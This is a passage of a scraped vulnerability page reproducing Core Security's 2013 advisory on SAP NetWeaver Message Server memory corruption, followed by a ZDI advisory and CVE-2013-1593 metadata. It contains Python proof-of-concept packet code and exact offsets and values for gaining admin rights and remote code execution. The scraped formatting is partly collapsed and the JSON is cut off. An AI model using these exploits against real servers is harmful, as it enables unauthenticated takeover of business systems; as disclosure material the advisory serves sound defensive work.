    def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)

    def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)

    def initialize_connection(hostname, port):

    # Connect
    print "[*] Connecting to", hostname, "port", port
    connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connection.connect((hostname, port))
    
    # Send initialization packet
    print "[*] Conected, sending login request"
    
    init = '**MESSAGE**\x00' # eyecatcher
    init+= '\x04' # version
    init+= '\x00' # errorno
    init+= client_string # toname
    init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
    

    msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init)

    # Receive response
    print "[*] Receiving login reply"
    (length, data) = receive(connection)
    
    # Parsing login reply
    server_name = data[4+64:4+64+40]
    
    return connection
    

    Main PoC body

    connection = initialize_connection(options.hostname, options.port) send_attack(connection)

    -----/

    In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.

    8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module.

    The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows:

    /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT':

    /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...

    -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function:

    /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds

    -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct:

    /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends

    -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below:

    /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1

    .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ;


    .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ;


    .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ;


    .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ;


    .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx

    [...]

    -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives:

    /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8]

    -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server.

    A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below:

    /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends

    -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client:

    /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed

    -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0':

    /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r

    -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0':

    /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...

    -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server.

    After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation:

    1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections.
    2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server.

    8.1.1. Gaining remote code execution by overwriting function pointers

    Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet.

    One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters:

    /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]

    ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER

    ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost>

    [...]

    -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set').

    After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function:

    /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer

    -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array.

    8.1.2. Modify the configuration and behavior of the server

    After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps:

    1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'.
    2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number).

    The following python code can be used to trigger the vulnerability:

    /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd

    crash+=
    

    "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash)

    print "[*] Crash sent !"
    

    -----/

    8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module.

    The following python code can be used to trigger the vulnerability:

    /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd

    crash+= "AD-EYECATCH\x00"
    crash+= "\x01\x01"
    crash+= "%11d" % 104
    crash+= "%11d" % 1
    crash+= "\x15\x00\x00\x00"
    crash+= "\x20\x00\x00\xc8"
    crash+= "LALA" + ' '*(20-4)
    crash+= "LOLO" + ' '*(40-4)
    crash+= " "*36
    send_packet(connection, crash)
    
    print "[*] Crash sent !"
    

    -----/

    1. Report Timeline . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd,
    2. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published.

    3. References

    [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.

    [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.

    [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.

    1. About CoreLabs

    CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

    1. About Core Security Technologies

    Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

    Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

    1. Disclaimer

    The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

    1. PGP/GPG Keys

    This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012

    • -- CVE ID:

    • -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C

    • -- Affected Vendors: SAP

    • -- Affected Products: SAP NetWeaver

    • -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407.

    • -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40

    • -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory

    • -- Credit: This vulnerability was discovered by:

    • e6af8de8b1d4b2b6d5ba2610cbf9cd38

    • -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

    Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com
    

    The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

    Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/
    

    Follow the ZDI on Twitter:

    http://twitter.com/thezdi
    

    -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8

    wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "netweaver",
            "scope": null,
            "trust": 2.1,
            "vendor": "sap",
            "version": null
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "sap",
            "version": "2004s"
          },
          {
            "_id": null,
            "model": "netweaver abap",
            "scope": null,
            "trust": 1.2,
            "vendor": "sap",
            "version": null
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sap",
            "version": "7.01"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sap",
            "version": "7.02"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sap",
            "version": "7.30"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sap",
            "version": null
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sap",
            "version": "7.01 sr1"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sap",
            "version": "7.02 sp06"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sap",
            "version": "7.30 sp04"
          },
          {
            "_id": null,
            "model": "netweaver abap null",
            "scope": "eq",
            "trust": 0.4,
            "vendor": "sap",
            "version": "*"
          },
          {
            "_id": null,
            "model": "netweaver 2004s",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "BID",
            "id": "57956"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007128"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1593"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          }
        ],
        "trust": 2.1
      },
      "cve": "CVE-2013-1593",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2013-1593",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "ZDI-12-112",
                "impactScore": 8.5,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "ZDI-12-111",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "ZDI-12-104",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "29348194-1f62-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2013-1593",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2013-1593",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-1593",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-1593",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "ZDI",
                "id": "ZDI-12-112",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "ZDI",
                "id": "ZDI-12-111",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "ZDI",
                "id": "ZDI-12-104",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "29348194-1f62-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2013-1593",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1593"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007128"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1593"
          }
        ]
      },
      "description": {
        "_id": null,
